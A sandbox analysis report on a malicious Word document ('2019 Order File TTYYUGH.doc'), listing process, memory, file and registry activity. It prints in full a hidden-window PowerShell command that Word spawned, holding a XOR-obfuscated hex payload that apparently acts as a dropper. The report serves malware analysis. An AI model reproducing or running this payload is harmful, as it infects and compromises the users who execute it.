7ea94da41974adefe99eeb883523b757cea10becf09185af05b9f464faa70712 (SHA256)
2019 Order File TTYYUGH.doc
Word Document
Created at 2019-02-11 09:17:00
Notifications (2/4)
Due to a WHOIS service error, no query could be made to get WHOIS data of any contacted domain.
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
511
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:24, Reason: Analysis Target |
| Unmonitor | End Time: 00:04:40, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x920 |
| Parent PID | 0x460 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B0
0x
9AC
0x
9A8
0x
99C
0x
994
0x
980
0x
97C
0x
978
0x
974
0x
970
0x
96C
0x
968
0x
964
0x
960
0x
95C
0x
958
0x
938
0x
934
0x
92C
0x
928
0x
924
0x
9F4
0x
9F8
0x
A34
0x
B84
0x
89C
0x
6EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00152fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00282fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00590fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x005c0000 | 0x005cbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00767fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x01cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01d00000 | 0x01fcefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001fd0000 | 0x01fd0000 | 0x023c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x025bffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x025c0000 | 0x025c7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x025d0000 | 0x025dffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000025e0000 | 0x025e0000 | 0x025e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000025f0000 | 0x025f0000 | 0x025f4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002600000 | 0x02600000 | 0x02600fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x02610fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x0290efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002920000 | 0x02920000 | 0x02920fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x02930fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002940000 | 0x02940000 | 0x02941fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| msxml6r.dll | 0x02960000 | 0x02960fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x02970000 | 0x0298ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a90000 | 0x02a90000 | 0x02a90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002aa0000 | 0x02aa0000 | 0x02aa1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ab0000 | 0x02ab0000 | 0x02ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02ad1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02ae0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02beffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02bf0000 | 0x02caffff | Memory Mapped File | rw |
|
|
|
- |
| c_1255.nls | 0x02cb0000 | 0x02cc0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002cd0000 | 0x02cd0000 | 0x02dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x02faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x02fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x03080000 | 0x030fefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x0311ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003120000 | 0x03120000 | 0x0321ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003240000 | 0x03240000 | 0x0333ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033b0000 | 0x033b0000 | 0x034affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000034b0000 | 0x034b0000 | 0x038affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000038f0000 | 0x038f0000 | 0x039effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039f0000 | 0x039f0000 | 0x03aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b20000 | 0x03b20000 | 0x03b2ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x03b30000 | 0x03bdafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003c00000 | 0x03c00000 | 0x03c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c40000 | 0x03c40000 | 0x03cbffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003cc0000 | 0x03cc0000 | 0x040bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041a0000 | 0x041a0000 | 0x0429ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x043dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004800000 | 0x04800000 | 0x04b42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e90000 | 0x04e90000 | 0x0568ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005710000 | 0x05710000 | 0x0580ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005830000 | 0x05830000 | 0x0592ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05930000 | 0x0625ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000062e0000 | 0x062e0000 | 0x063dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000063e0000 | 0x063e0000 | 0x0645ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006460000 | 0x06460000 | 0x0655ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006600000 | 0x06600000 | 0x066fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000067e0000 | 0x067e0000 | 0x068dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069a0000 | 0x069a0000 | 0x06a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b60000 | 0x06b60000 | 0x06c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006c60000 | 0x06c60000 | 0x07c5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007c60000 | 0x07c60000 | 0x0845ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008500000 | 0x08500000 | 0x0857ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000085e0000 | 0x085e0000 | 0x0865ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008660000 | 0x08660000 | 0x08a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008a60000 | 0x08a60000 | 0x08e60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008e70000 | 0x08e70000 | 0x09270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009280000 | 0x09280000 | 0x09680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009690000 | 0x09690000 | 0x0988ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009890000 | 0x09890000 | 0x0a890fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000a8a0000 | 0x0a8a0000 | 0x0ac9ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000374f0000 | 0x374f0000 | 0x374fffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037620000 | 0x37620000 | 0x3762ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x75010000 | 0x75042fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x777b0000 | 0x777b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13fc00000 | 0x13fddbfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febd6d0000 | 0x7febd6d0000 | 0x7febd6dffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febefc0000 | 0x7febefc0000 | 0x7febefcffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4560000 | 0x7fee47b4fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee47c0000 | 0x7fee5595fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee55a0000 | 0x7fee5713fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5720000 | 0x7fee5839fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5840000 | 0x7fee5adafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5c80000 | 0x7fee5d18fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee5d20000 | 0x7fee5e9dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee5ea0000 | 0x7fee606ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee6070000 | 0x7fee620cfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fee6210000 | 0x7fee62cffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee62d0000 | 0x7feea6b6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea6c0000 | 0x7feeb3b4fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb3c0000 | 0x7feeb7fcfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feeb800000 | 0x7feeb8e1fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feeb8f0000 | 0x7feed31bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed320000 | 0x7feedfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feedfd0000 | 0x7feeea9efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feeeaa0000 | 0x7feef183fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef190000 | 0x7feef632fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef640000 | 0x7fef05c4fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef05d0000 | 0x7fef2da8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef2ea0000 | 0x7fef2f0efff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef2f10000 | 0x7fef2f9afff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fef2fa0000 | 0x7fef303bfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef3040000 | 0x7fef3105fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x7fef3280000 | 0x7fef3298fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 308 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wrs{a60a3be7-00a8-4b59-b7cf-d5673d1a51a1}.tmp | 1.00 KB |
MD5:
f131d4ca6770982fdad4a3a65ae8cec6
SHA1: 0597e1258ff418156820e1b152875bd33b615ae7 SHA256: 41303e00130b34d259dd0e746ddb6ce0d02d2a51798a63c320ddb0a208097ddd SSDeep: 3:ol3lPgQK+:4OQK+ |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~$ro0000.doc | 0.16 KB |
MD5:
0cd2c628b85af488e273619ffd2885db
SHA1: 7d68e57190ae111de96132e994e2f357f12b3185 SHA256: 40b76bdd2244be4b4b75b10604291ede6b616dc590324496aeac87c28323889f SSDeep: 3:HiBNElgljgflnt1l39XLFjVfNl9XLFjVZcmt9Xi:gElgiNR39ll9imt9y |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wro0000.doc | 10.91 KB |
MD5:
36ea1fe6dfb5a2fea33d23b1dd39e9df
SHA1: 957166ce68b75108cfeb624f1fcbac87803fab87 SHA256: cfeb74222f718e9b3432c49ea425bf69410f21e6d7f184c2db75eeea2499ca01 SSDeep: 192:CtNCdYJH/U3S7Ok0Pw1a4t8GlVbBV99V6iPBkeawLWdxd7o+Kk:aNeWcC78PwT8GlVbB76akwLWdxdE+Kk |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WScript.Shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (57)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
4 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 | data = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 231 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell.exe -windowstyle hidden -noprofile function n47f6 { param($d17d93) $qfab72a = 'w6788'; $o14135a = ''; for ($i = 0; $i -lt $d17d93.length; $i+=2) { $eb44f = [convert]::ToByte($d17d93.Substring($i, 2), 16); $o14135a += [char]($eb44f -bxor $qfab72a[($i / 2) % $qfab72a.length]); } return $o14135a; } $sf6669 = '02455e565f57654e4b4c125b0c353202455e565f57654e4b4c125b196a4d19425e555d597f594c5d0559476b5d05405e5b5d040d3a324802545b515b57555b594b0416590b0b11550035320c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556183e5843684c0516705d4c2744585b791352455d4b041e7e564c27424518503a59534d54121a174b4c055f595f180744585b76165b5211037a3c17181857161718182c725b54711a46584a4c5f145c5d4a19535b0b0a551f6a35325716171818571617484d155a5e5b180442564c51141652404c12445918711942674c4a577a58595c3b5f554a59054f1f4b4c055f595f1819575a5d114c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556181559585418215f454c4d165a674a570353544c103e5843684c05165b48791352455d4b041a176d711942674c4a5752406b510d531b184d1e5843185e1b78524f680559435d5b031a17574d031642515603165b485e1b795b5c680559435d5b031f0c35325716171818571617637c1b5a7e5548184443101a3c5345565d1b0505165c1b5a1514183258434a4127595e564c570b171a6a035a7a574e127b525557054f15141824534374590442724a4a184417051811575b4b5d5e6b3a321857161718185716444c59035f54185d0f42524a56574058515c577b584e5d3a535a574a0e1e7e564c274245185c12454314183e5843684c0516444a5b5b165e564c57455e425d5e0d3a32357d16171818571617184802545b515b574543594c1e55175156031654010a1102545b105e3b3d18185716171818574d3a321857161718185716171818577f594c68034417555d1350005a5d570b17745716527b515a05574541101902005e0e5f14060e0d1502030d094600060b0d1603551a115e0d3a321857161718185716171818575f5118101a53535e0f1553170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a321857161718185716171818577f594c680344175d5b12555418055771524c68055954795c1344524b4b5f5b525c5e40545214181902005e0e5f14040e0d1502030d094154060c0d40030e0f59435206090d4703050c59551f1e03357d161718185716171818571617515e571e525b5d1455170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a32185716171818571617181857637e564c274245185c00655e425d570b17106d3e5843684c051f0203357d1617181857161718185716174d51194217625d0559170518470d3a321857161718185716171818575f51181056605e4a4c02575b684a1842525b4c5f53545d5b141a175c4f245f4d5d1457064f0c085b16584d4c576c524a575e1f3a321857161718185716171818574d3a32185716171818571617181857161718180553434d4a19160603357d16171818571617181857161745357d1617181857161718185716177a4103536c65182757435b50570b174318474e04091457064f5e5e5b1607400147164a03357d16171818571617181857161771560366434a1802585a59561651525c68185f594c5d05160a187516444450591b1876545418557f7f541854565410441f0c35325716171818571617181857167a594a045e56541634594741102757435b505b1607141802585a5956165152